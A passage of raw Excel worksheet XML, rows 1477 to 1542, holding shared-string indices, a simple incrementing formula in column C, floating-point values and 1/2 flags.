        <v>9.8620834350585938</v>
      </c>
      <c r="F1477">
        <v>2</v>
      </c>
    </row>
    <row r="1478" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1478" t="s">
        <v>2843</v>
      </c>
      <c r="B1478" t="s">
        <v>2844</v>
      </c>
      <c r="C1478">
        <f t="shared" si="22"/>
        <v>11280869</v>
      </c>
      <c r="D1478" t="s">
        <v>2845</v>
      </c>
      <c r="E1478">
        <v>30.6278190612793</v>
      </c>
      <c r="F1478">
        <v>1</v>
      </c>
    </row>
    <row r="1479" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1479" t="s">
        <v>2843</v>
      </c>
      <c r="B1479" t="s">
        <v>2844</v>
      </c>
      <c r="C1479">
        <f t="shared" si="22"/>
        <v>11282122</v>
      </c>
      <c r="D1479" t="s">
        <v>2846</v>
      </c>
      <c r="E1479">
        <v>2.7455670833587651</v>
      </c>
      <c r="F1479">
        <v>2</v>
      </c>
    </row>
    <row r="1480" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1480" t="s">
        <v>2847</v>
      </c>
      <c r="B1480" t="s">
        <v>2848</v>
      </c>
      <c r="C1480">
        <f t="shared" si="22"/>
        <v>11283375</v>
      </c>
      <c r="D1480" t="s">
        <v>2849</v>
      </c>
      <c r="E1480">
        <v>24.203254699707031</v>
      </c>
      <c r="F1480">
        <v>1</v>
      </c>
    </row>
    <row r="1481" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1481" t="s">
        <v>2847</v>
      </c>
      <c r="B1481" t="s">
        <v>2848</v>
      </c>
      <c r="C1481">
        <f t="shared" si="22"/>
        <v>11284628</v>
      </c>
      <c r="D1481" t="s">
        <v>2850</v>
      </c>
      <c r="E1481">
        <v>4.1880011558532706</v>
      </c>
      <c r="F1481">
        <v>2</v>
      </c>
    </row>
    <row r="1482" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1482" t="s">
        <v>2851</v>
      </c>
      <c r="B1482" t="s">
        <v>2852</v>
      </c>
      <c r="C1482">
        <f t="shared" ref="C1482:C1545" si="23">C1481+1253</f>
        <v>11285881</v>
      </c>
      <c r="D1482" t="s">
        <v>2853</v>
      </c>
      <c r="E1482">
        <v>26.123649597167969</v>
      </c>
      <c r="F1482">
        <v>1</v>
      </c>
    </row>
    <row r="1483" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1483" t="s">
        <v>2851</v>
      </c>
      <c r="B1483" t="s">
        <v>2852</v>
      </c>
      <c r="C1483">
        <f t="shared" si="23"/>
        <v>11287134</v>
      </c>
      <c r="D1483" t="s">
        <v>2854</v>
      </c>
      <c r="E1483">
        <v>4.4618277549743652</v>
      </c>
      <c r="F1483">
        <v>2</v>
      </c>
    </row>
    <row r="1484" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1484" t="s">
        <v>2855</v>
      </c>
      <c r="B1484" t="s">
        <v>2856</v>
      </c>
      <c r="C1484">
        <f t="shared" si="23"/>
        <v>11288387</v>
      </c>
      <c r="D1484" t="s">
        <v>2857</v>
      </c>
      <c r="E1484">
        <v>27.91471099853516</v>
      </c>
      <c r="F1484">
        <v>1</v>
      </c>
    </row>
    <row r="1485" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1485" t="s">
        <v>2855</v>
      </c>
      <c r="B1485" t="s">
        <v>2856</v>
      </c>
      <c r="C1485">
        <f t="shared" si="23"/>
        <v>11289640</v>
      </c>
      <c r="D1485" t="s">
        <v>2858</v>
      </c>
      <c r="E1485">
        <v>3.9783530235290532</v>
      </c>
      <c r="F1485">
        <v>2</v>
      </c>
    </row>
    <row r="1486" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1486" t="s">
        <v>2859</v>
      </c>
      <c r="B1486" t="s">
        <v>2860</v>
      </c>
      <c r="C1486">
        <f t="shared" si="23"/>
        <v>11290893</v>
      </c>
      <c r="D1486" t="s">
        <v>2861</v>
      </c>
      <c r="E1486">
        <v>22.67041015625</v>
      </c>
      <c r="F1486">
        <v>1</v>
      </c>
    </row>
    <row r="1487" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1487" t="s">
        <v>2859</v>
      </c>
      <c r="B1487" t="s">
        <v>2860</v>
      </c>
      <c r="C1487">
        <f t="shared" si="23"/>
        <v>11292146</v>
      </c>
      <c r="D1487" t="s">
        <v>2862</v>
      </c>
      <c r="E1487">
        <v>3.083038900513202E-4</v>
      </c>
      <c r="F1487">
        <v>2</v>
      </c>
    </row>
    <row r="1488" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1488" t="s">
        <v>2863</v>
      </c>
      <c r="B1488" t="s">
        <v>2864</v>
      </c>
      <c r="C1488">
        <f t="shared" si="23"/>
        <v>11293399</v>
      </c>
      <c r="D1488" t="s">
        <v>2865</v>
      </c>
      <c r="E1488">
        <v>20.96114540100098</v>
      </c>
      <c r="F1488">
        <v>1</v>
      </c>
    </row>
    <row r="1489" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1489" t="s">
        <v>2863</v>
      </c>
      <c r="B1489" t="s">
        <v>2864</v>
      </c>
      <c r="C1489">
        <f t="shared" si="23"/>
        <v>11294652</v>
      </c>
      <c r="D1489" t="s">
        <v>2866</v>
      </c>
      <c r="E1489">
        <v>4.4622459411621094</v>
      </c>
      <c r="F1489">
        <v>2</v>
      </c>
    </row>
    <row r="1490" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1490" t="s">
        <v>2867</v>
      </c>
      <c r="B1490" t="s">
        <v>2868</v>
      </c>
      <c r="C1490">
        <f t="shared" si="23"/>
        <v>11295905</v>
      </c>
      <c r="D1490" t="s">
        <v>2869</v>
      </c>
      <c r="E1490">
        <v>21.832588195800781</v>
      </c>
      <c r="F1490">
        <v>1</v>
      </c>
    </row>
    <row r="1491" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1491" t="s">
        <v>2867</v>
      </c>
      <c r="B1491" t="s">
        <v>2868</v>
      </c>
      <c r="C1491">
        <f t="shared" si="23"/>
        <v>11297158</v>
      </c>
      <c r="D1491" t="s">
        <v>2870</v>
      </c>
      <c r="E1491">
        <v>15.05693435668945</v>
      </c>
      <c r="F1491">
        <v>2</v>
      </c>
    </row>
    <row r="1492" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1492" t="s">
        <v>2871</v>
      </c>
      <c r="B1492" t="s">
        <v>2872</v>
      </c>
      <c r="C1492">
        <f t="shared" si="23"/>
        <v>11298411</v>
      </c>
      <c r="D1492" t="s">
        <v>2873</v>
      </c>
      <c r="E1492">
        <v>27.760793685913089</v>
      </c>
      <c r="F1492">
        <v>1</v>
      </c>
    </row>
    <row r="1493" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1493" t="s">
        <v>2871</v>
      </c>
      <c r="B1493" t="s">
        <v>2872</v>
      </c>
      <c r="C1493">
        <f t="shared" si="23"/>
        <v>11299664</v>
      </c>
      <c r="D1493" t="s">
        <v>2874</v>
      </c>
      <c r="E1493">
        <v>2.910555362701416</v>
      </c>
      <c r="F1493">
        <v>2</v>
      </c>
    </row>
    <row r="1494" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1494" t="s">
        <v>2875</v>
      </c>
      <c r="B1494" t="s">
        <v>2876</v>
      </c>
      <c r="C1494">
        <f t="shared" si="23"/>
        <v>11300917</v>
      </c>
      <c r="D1494" t="s">
        <v>2877</v>
      </c>
      <c r="E1494">
        <v>27.044040679931641</v>
      </c>
      <c r="F1494">
        <v>1</v>
      </c>
    </row>
    <row r="1495" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1495" t="s">
        <v>2875</v>
      </c>
      <c r="B1495" t="s">
        <v>2876</v>
      </c>
      <c r="C1495">
        <f t="shared" si="23"/>
        <v>11302170</v>
      </c>
      <c r="D1495" t="s">
        <v>2878</v>
      </c>
      <c r="E1495">
        <v>1.3883600234985349</v>
      </c>
      <c r="F1495">
        <v>2</v>
      </c>
    </row>
    <row r="1496" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1496" t="s">
        <v>2879</v>
      </c>
      <c r="B1496" t="s">
        <v>2880</v>
      </c>
      <c r="C1496">
        <f t="shared" si="23"/>
        <v>11303423</v>
      </c>
      <c r="D1496" t="s">
        <v>2881</v>
      </c>
      <c r="E1496">
        <v>24.29024696350098</v>
      </c>
      <c r="F1496">
        <v>1</v>
      </c>
    </row>
    <row r="1497" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1497" t="s">
        <v>2879</v>
      </c>
      <c r="B1497" t="s">
        <v>2880</v>
      </c>
      <c r="C1497">
        <f t="shared" si="23"/>
        <v>11304676</v>
      </c>
      <c r="D1497" t="s">
        <v>2882</v>
      </c>
      <c r="E1497">
        <v>10.542350769042971</v>
      </c>
      <c r="F1497">
        <v>2</v>
      </c>
    </row>
    <row r="1498" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1498" t="s">
        <v>2883</v>
      </c>
      <c r="B1498" t="s">
        <v>2884</v>
      </c>
      <c r="C1498">
        <f t="shared" si="23"/>
        <v>11305929</v>
      </c>
      <c r="D1498" t="s">
        <v>2885</v>
      </c>
      <c r="E1498">
        <v>26.122360229492191</v>
      </c>
      <c r="F1498">
        <v>1</v>
      </c>
    </row>
    <row r="1499" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1499" t="s">
        <v>2883</v>
      </c>
      <c r="B1499" t="s">
        <v>2884</v>
      </c>
      <c r="C1499">
        <f t="shared" si="23"/>
        <v>11307182</v>
      </c>
      <c r="D1499" t="s">
        <v>2886</v>
      </c>
      <c r="E1499">
        <v>6.0666427612304688</v>
      </c>
      <c r="F1499">
        <v>2</v>
      </c>
    </row>
    <row r="1500" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1500" t="s">
        <v>2887</v>
      </c>
      <c r="B1500" t="s">
        <v>2888</v>
      </c>
      <c r="C1500">
        <f t="shared" si="23"/>
        <v>11308435</v>
      </c>
      <c r="D1500" t="s">
        <v>2889</v>
      </c>
      <c r="E1500">
        <v>34.955589294433587</v>
      </c>
      <c r="F1500">
        <v>1</v>
      </c>
    </row>
    <row r="1501" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1501" t="s">
        <v>2887</v>
      </c>
      <c r="B1501" t="s">
        <v>2888</v>
      </c>
      <c r="C1501">
        <f t="shared" si="23"/>
        <v>11309688</v>
      </c>
      <c r="D1501" t="s">
        <v>2890</v>
      </c>
      <c r="E1501">
        <v>12.15459632873535</v>
      </c>
      <c r="F1501">
        <v>2</v>
      </c>
    </row>
    <row r="1502" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1502" t="s">
        <v>2891</v>
      </c>
      <c r="B1502" t="s">
        <v>2892</v>
      </c>
      <c r="C1502">
        <f t="shared" si="23"/>
        <v>11310941</v>
      </c>
      <c r="D1502" t="s">
        <v>2893</v>
      </c>
      <c r="E1502">
        <v>22.218208312988281</v>
      </c>
      <c r="F1502">
        <v>1</v>
      </c>
    </row>
    <row r="1503" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1503" t="s">
        <v>2891</v>
      </c>
      <c r="B1503" t="s">
        <v>2892</v>
      </c>
      <c r="C1503">
        <f t="shared" si="23"/>
        <v>11312194</v>
      </c>
      <c r="D1503" t="s">
        <v>2894</v>
      </c>
      <c r="E1503">
        <v>15.39155864715576</v>
      </c>
      <c r="F1503">
        <v>2</v>
      </c>
    </row>
    <row r="1504" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1504" t="s">
        <v>2895</v>
      </c>
      <c r="B1504" t="s">
        <v>2896</v>
      </c>
      <c r="C1504">
        <f t="shared" si="23"/>
        <v>11313447</v>
      </c>
      <c r="D1504" t="s">
        <v>2897</v>
      </c>
      <c r="E1504">
        <v>19.549861907958981</v>
      </c>
      <c r="F1504">
        <v>1</v>
      </c>
    </row>
    <row r="1505" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1505" t="s">
        <v>2895</v>
      </c>
      <c r="B1505" t="s">
        <v>2896</v>
      </c>
      <c r="C1505">
        <f t="shared" si="23"/>
        <v>11314700</v>
      </c>
      <c r="D1505" t="s">
        <v>2898</v>
      </c>
      <c r="E1505">
        <v>6.0478768348693848</v>
      </c>
      <c r="F1505">
        <v>2</v>
      </c>
    </row>
    <row r="1506" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1506" t="s">
        <v>2899</v>
      </c>
      <c r="B1506" t="s">
        <v>2900</v>
      </c>
      <c r="C1506">
        <f t="shared" si="23"/>
        <v>11315953</v>
      </c>
      <c r="D1506" t="s">
        <v>2901</v>
      </c>
      <c r="E1506">
        <v>23.818439483642582</v>
      </c>
      <c r="F1506">
        <v>1</v>
      </c>
    </row>
    <row r="1507" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1507" t="s">
        <v>2899</v>
      </c>
      <c r="B1507" t="s">
        <v>2900</v>
      </c>
      <c r="C1507">
        <f t="shared" si="23"/>
        <v>11317206</v>
      </c>
      <c r="D1507" t="s">
        <v>2902</v>
      </c>
      <c r="E1507">
        <v>4.2388453483581543</v>
      </c>
      <c r="F1507">
        <v>2</v>
      </c>
    </row>
    <row r="1508" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1508" t="s">
        <v>2903</v>
      </c>
      <c r="B1508" t="s">
        <v>2904</v>
      </c>
      <c r="C1508">
        <f t="shared" si="23"/>
        <v>11318459</v>
      </c>
      <c r="D1508" t="s">
        <v>2905</v>
      </c>
      <c r="E1508">
        <v>25.071762084960941</v>
      </c>
      <c r="F1508">
        <v>1</v>
      </c>
    </row>
    <row r="1509" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1509" t="s">
        <v>2903</v>
      </c>
      <c r="B1509" t="s">
        <v>2904</v>
      </c>
      <c r="C1509">
        <f t="shared" si="23"/>
        <v>11319712</v>
      </c>
      <c r="D1509" t="s">
        <v>2906</v>
      </c>
      <c r="E1509">
        <v>7.9603762626647949</v>
      </c>
      <c r="F1509">
        <v>2</v>
      </c>
    </row>
    <row r="1510" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1510" t="s">
        <v>2907</v>
      </c>
      <c r="B1510" t="s">
        <v>2908</v>
      </c>
      <c r="C1510">
        <f t="shared" si="23"/>
        <v>11320965</v>
      </c>
      <c r="D1510" t="s">
        <v>2909</v>
      </c>
      <c r="E1510">
        <v>18.0096435546875</v>
      </c>
      <c r="F1510">
        <v>1</v>
      </c>
    </row>
    <row r="1511" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1511" t="s">
        <v>2907</v>
      </c>
      <c r="B1511" t="s">
        <v>2908</v>
      </c>
      <c r="C1511">
        <f t="shared" si="23"/>
        <v>11322218</v>
      </c>
      <c r="D1511" t="s">
        <v>2910</v>
      </c>
      <c r="E1511">
        <v>12.901400566101071</v>
      </c>
      <c r="F1511">
        <v>2</v>
      </c>
    </row>
    <row r="1512" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1512" t="s">
        <v>2911</v>
      </c>
      <c r="B1512" t="s">
        <v>2912</v>
      </c>
      <c r="C1512">
        <f t="shared" si="23"/>
        <v>11323471</v>
      </c>
      <c r="D1512" t="s">
        <v>2913</v>
      </c>
      <c r="E1512">
        <v>21.486978530883789</v>
      </c>
      <c r="F1512">
        <v>1</v>
      </c>
    </row>
    <row r="1513" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1513" t="s">
        <v>2911</v>
      </c>
      <c r="B1513" t="s">
        <v>2912</v>
      </c>
      <c r="C1513">
        <f t="shared" si="23"/>
        <v>11324724</v>
      </c>
      <c r="D1513" t="s">
        <v>2914</v>
      </c>
      <c r="E1513">
        <v>3.6128609180450439</v>
      </c>
      <c r="F1513">
        <v>2</v>
      </c>
    </row>
    <row r="1514" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1514" t="s">
        <v>2915</v>
      </c>
      <c r="B1514" t="s">
        <v>2916</v>
      </c>
      <c r="C1514">
        <f t="shared" si="23"/>
        <v>11325977</v>
      </c>
      <c r="D1514" t="s">
        <v>2917</v>
      </c>
      <c r="E1514">
        <v>18.500551223754879</v>
      </c>
      <c r="F1514">
        <v>1</v>
      </c>
    </row>
    <row r="1515" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1515" t="s">
        <v>2915</v>
      </c>
      <c r="B1515" t="s">
        <v>2916</v>
      </c>
      <c r="C1515">
        <f t="shared" si="23"/>
        <v>11327230</v>
      </c>
      <c r="D1515" t="s">
        <v>2918</v>
      </c>
      <c r="E1515">
        <v>10.930764198303221</v>
      </c>
      <c r="F1515">
        <v>2</v>
      </c>
    </row>
    <row r="1516" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1516" t="s">
        <v>2919</v>
      </c>
      <c r="B1516" t="s">
        <v>2920</v>
      </c>
      <c r="C1516">
        <f t="shared" si="23"/>
        <v>11328483</v>
      </c>
      <c r="D1516" t="s">
        <v>2921</v>
      </c>
      <c r="E1516">
        <v>27.83690071105957</v>
      </c>
      <c r="F1516">
        <v>1</v>
      </c>
    </row>
    <row r="1517" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1517" t="s">
        <v>2919</v>
      </c>
      <c r="B1517" t="s">
        <v>2920</v>
      </c>
      <c r="C1517">
        <f t="shared" si="23"/>
        <v>11329736</v>
      </c>
      <c r="D1517" t="s">
        <v>2922</v>
      </c>
      <c r="E1517">
        <v>0.2345763295888901</v>
      </c>
      <c r="F1517">
        <v>2</v>
      </c>
    </row>
    <row r="1518" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1518" t="s">
        <v>2923</v>
      </c>
      <c r="B1518" t="s">
        <v>2924</v>
      </c>
      <c r="C1518">
        <f t="shared" si="23"/>
        <v>11330989</v>
      </c>
      <c r="D1518" t="s">
        <v>2925</v>
      </c>
      <c r="E1518">
        <v>21.082075119018551</v>
      </c>
      <c r="F1518">
        <v>1</v>
      </c>
    </row>
    <row r="1519" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1519" t="s">
        <v>2923</v>
      </c>
      <c r="B1519" t="s">
        <v>2924</v>
      </c>
      <c r="C1519">
        <f t="shared" si="23"/>
        <v>11332242</v>
      </c>
      <c r="D1519" t="s">
        <v>2926</v>
      </c>
      <c r="E1519">
        <v>14.299216270446779</v>
      </c>
      <c r="F1519">
        <v>2</v>
      </c>
    </row>
    <row r="1520" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1520" t="s">
        <v>2927</v>
      </c>
      <c r="B1520" t="s">
        <v>2928</v>
      </c>
      <c r="C1520">
        <f t="shared" si="23"/>
        <v>11333495</v>
      </c>
      <c r="D1520" t="s">
        <v>2929</v>
      </c>
      <c r="E1520">
        <v>24.995908737182621</v>
      </c>
      <c r="F1520">
        <v>1</v>
      </c>
    </row>
    <row r="1521" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1521" t="s">
        <v>2927</v>
      </c>
      <c r="B1521" t="s">
        <v>2928</v>
      </c>
      <c r="C1521">
        <f t="shared" si="23"/>
        <v>11334748</v>
      </c>
      <c r="D1521" t="s">
        <v>2930</v>
      </c>
      <c r="E1521">
        <v>5.8688874244689941</v>
      </c>
      <c r="F1521">
        <v>2</v>
      </c>
    </row>
    <row r="1522" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1522" t="s">
        <v>2931</v>
      </c>
      <c r="B1522" t="s">
        <v>2932</v>
      </c>
      <c r="C1522">
        <f t="shared" si="23"/>
        <v>11336001</v>
      </c>
      <c r="D1522" t="s">
        <v>2933</v>
      </c>
      <c r="E1522">
        <v>31.92166900634766</v>
      </c>
      <c r="F1522">
        <v>1</v>
      </c>
    </row>
    <row r="1523" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1523" t="s">
        <v>2931</v>
      </c>
      <c r="B1523" t="s">
        <v>2932</v>
      </c>
      <c r="C1523">
        <f t="shared" si="23"/>
        <v>11337254</v>
      </c>
      <c r="D1523" t="s">
        <v>2934</v>
      </c>
      <c r="E1523">
        <v>2.6902457699179649E-2</v>
      </c>
      <c r="F1523">
        <v>2</v>
      </c>
    </row>
    <row r="1524" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1524" t="s">
        <v>2935</v>
      </c>
      <c r="B1524" t="s">
        <v>2936</v>
      </c>
      <c r="C1524">
        <f t="shared" si="23"/>
        <v>11338507</v>
      </c>
      <c r="D1524" t="s">
        <v>2937</v>
      </c>
      <c r="E1524">
        <v>23.541469573974609</v>
      </c>
      <c r="F1524">
        <v>1</v>
      </c>
    </row>
    <row r="1525" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1525" t="s">
        <v>2935</v>
      </c>
      <c r="B1525" t="s">
        <v>2936</v>
      </c>
      <c r="C1525">
        <f t="shared" si="23"/>
        <v>11339760</v>
      </c>
      <c r="D1525" t="s">
        <v>2938</v>
      </c>
      <c r="E1525">
        <v>9.5542488098144531</v>
      </c>
      <c r="F1525">
        <v>2</v>
      </c>
    </row>
    <row r="1526" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1526" t="s">
        <v>2939</v>
      </c>
      <c r="B1526" t="s">
        <v>2940</v>
      </c>
      <c r="C1526">
        <f t="shared" si="23"/>
        <v>11341013</v>
      </c>
      <c r="D1526" t="s">
        <v>2941</v>
      </c>
      <c r="E1526">
        <v>20.680778503417969</v>
      </c>
      <c r="F1526">
        <v>1</v>
      </c>
    </row>
    <row r="1527" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1527" t="s">
        <v>2939</v>
      </c>
      <c r="B1527" t="s">
        <v>2940</v>
      </c>
      <c r="C1527">
        <f t="shared" si="23"/>
        <v>11342266</v>
      </c>
      <c r="D1527" t="s">
        <v>2942</v>
      </c>
      <c r="E1527">
        <v>18.569868087768551</v>
      </c>
      <c r="F1527">
        <v>2</v>
      </c>
    </row>
    <row r="1528" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1528" t="s">
        <v>2943</v>
      </c>
      <c r="B1528" t="s">
        <v>2944</v>
      </c>
      <c r="C1528">
        <f t="shared" si="23"/>
        <v>11343519</v>
      </c>
      <c r="D1528" t="s">
        <v>2945</v>
      </c>
      <c r="E1528">
        <v>33.261764526367188</v>
      </c>
      <c r="F1528">
        <v>1</v>
      </c>
    </row>
    <row r="1529" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1529" t="s">
        <v>2943</v>
      </c>
      <c r="B1529" t="s">
        <v>2944</v>
      </c>
      <c r="C1529">
        <f t="shared" si="23"/>
        <v>11344772</v>
      </c>
      <c r="D1529" t="s">
        <v>2946</v>
      </c>
      <c r="E1529">
        <v>6.0844740867614746</v>
      </c>
      <c r="F1529">
        <v>2</v>
      </c>
    </row>
    <row r="1530" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1530" t="s">
        <v>2947</v>
      </c>
      <c r="B1530" t="s">
        <v>2948</v>
      </c>
      <c r="C1530">
        <f t="shared" si="23"/>
        <v>11346025</v>
      </c>
      <c r="D1530" t="s">
        <v>2949</v>
      </c>
      <c r="E1530">
        <v>24.67426872253418</v>
      </c>
      <c r="F1530">
        <v>1</v>
      </c>
    </row>
    <row r="1531" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1531" t="s">
        <v>2947</v>
      </c>
      <c r="B1531" t="s">
        <v>2948</v>
      </c>
      <c r="C1531">
        <f t="shared" si="23"/>
        <v>11347278</v>
      </c>
      <c r="D1531" t="s">
        <v>2950</v>
      </c>
      <c r="E1531">
        <v>12.39850902557373</v>
      </c>
      <c r="F1531">
        <v>2</v>
      </c>
    </row>
    <row r="1532" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1532" t="s">
        <v>2951</v>
      </c>
      <c r="B1532" t="s">
        <v>2952</v>
      </c>
      <c r="C1532">
        <f t="shared" si="23"/>
        <v>11348531</v>
      </c>
      <c r="D1532" t="s">
        <v>2953</v>
      </c>
      <c r="E1532">
        <v>34.171279907226563</v>
      </c>
      <c r="F1532">
        <v>1</v>
      </c>
    </row>
    <row r="1533" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1533" t="s">
        <v>2951</v>
      </c>
      <c r="B1533" t="s">
        <v>2952</v>
      </c>
      <c r="C1533">
        <f t="shared" si="23"/>
        <v>11349784</v>
      </c>
      <c r="D1533" t="s">
        <v>2954</v>
      </c>
      <c r="E1533">
        <v>1.397747982991859E-4</v>
      </c>
      <c r="F1533">
        <v>2</v>
      </c>
    </row>
    <row r="1534" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1534" t="s">
        <v>2955</v>
      </c>
      <c r="B1534" t="s">
        <v>2956</v>
      </c>
      <c r="C1534">
        <f t="shared" si="23"/>
        <v>11351037</v>
      </c>
      <c r="D1534" t="s">
        <v>2957</v>
      </c>
      <c r="E1534">
        <v>10.64645195007324</v>
      </c>
      <c r="F1534">
        <v>1</v>
      </c>
    </row>
    <row r="1535" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1535" t="s">
        <v>2955</v>
      </c>
      <c r="B1535" t="s">
        <v>2956</v>
      </c>
      <c r="C1535">
        <f t="shared" si="23"/>
        <v>11352290</v>
      </c>
      <c r="D1535" t="s">
        <v>2958</v>
      </c>
      <c r="E1535">
        <v>6.4072103500366211</v>
      </c>
      <c r="F1535">
        <v>2</v>
      </c>
    </row>
    <row r="1536" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1536" t="s">
        <v>2959</v>
      </c>
      <c r="B1536" t="s">
        <v>2960</v>
      </c>
      <c r="C1536">
        <f t="shared" si="23"/>
        <v>11353543</v>
      </c>
      <c r="D1536" t="s">
        <v>2961</v>
      </c>
      <c r="E1536">
        <v>31.248723983764648</v>
      </c>
      <c r="F1536">
        <v>1</v>
      </c>
    </row>
    <row r="1537" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1537" t="s">
        <v>2959</v>
      </c>
      <c r="B1537" t="s">
        <v>2960</v>
      </c>
      <c r="C1537">
        <f t="shared" si="23"/>
        <v>11354796</v>
      </c>
      <c r="D1537" t="s">
        <v>2962</v>
      </c>
      <c r="E1537">
        <v>0.98591387271881104</v>
      </c>
      <c r="F1537">
        <v>2</v>
      </c>
    </row>
    <row r="1538" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1538" t="s">
        <v>2963</v>
      </c>
      <c r="B1538" t="s">
        <v>2964</v>
      </c>
      <c r="C1538">
        <f t="shared" si="23"/>
        <v>11356049</v>
      </c>
      <c r="D1538" t="s">
        <v>2965</v>
      </c>
      <c r="E1538">
        <v>31.261777877807621</v>
      </c>
      <c r="F1538">
        <v>1</v>
      </c>
    </row>
    <row r="1539" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1539" t="s">
        <v>2963</v>
      </c>
      <c r="B1539" t="s">
        <v>2964</v>
      </c>
      <c r="C1539">
        <f t="shared" si="23"/>
        <v>11357302</v>
      </c>
      <c r="D1539" t="s">
        <v>2966</v>
      </c>
      <c r="E1539">
        <v>4.9139389991760254</v>
      </c>
      <c r="F1539">
        <v>2</v>
      </c>
    </row>
    <row r="1540" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1540" t="s">
        <v>2967</v>
      </c>
      <c r="B1540" t="s">
        <v>2968</v>
      </c>
      <c r="C1540">
        <f t="shared" si="23"/>
        <v>11358555</v>
      </c>
      <c r="D1540" t="s">
        <v>2969</v>
      </c>
      <c r="E1540">
        <v>10.653371810913089</v>
      </c>
      <c r="F1540">
        <v>1</v>
      </c>
    </row>
    <row r="1541" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1541" t="s">
        <v>2967</v>
      </c>
      <c r="B1541" t="s">
        <v>2968</v>
      </c>
      <c r="C1541">
        <f t="shared" si="23"/>
        <v>11359808</v>
      </c>
      <c r="D1541" t="s">
        <v>2970</v>
      </c>
      <c r="E1541">
        <v>1.0028338432312009</v>
      </c>
      <c r="F1541">
        <v>2</v>
      </c>
    </row>
    <row r="1542" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1542" t="s">
        <v>2971</v>
      </c>
      <c r="B1542" t="s">
        <v>2972</v>
      </c>
      <c r="C1542">
        <f t="shared" si="23"/>
        <v>11361061</v>
      </c>
      <c r="D1542" t="s">
        <v>2973</v>
      </c>
      <c r="E1542">
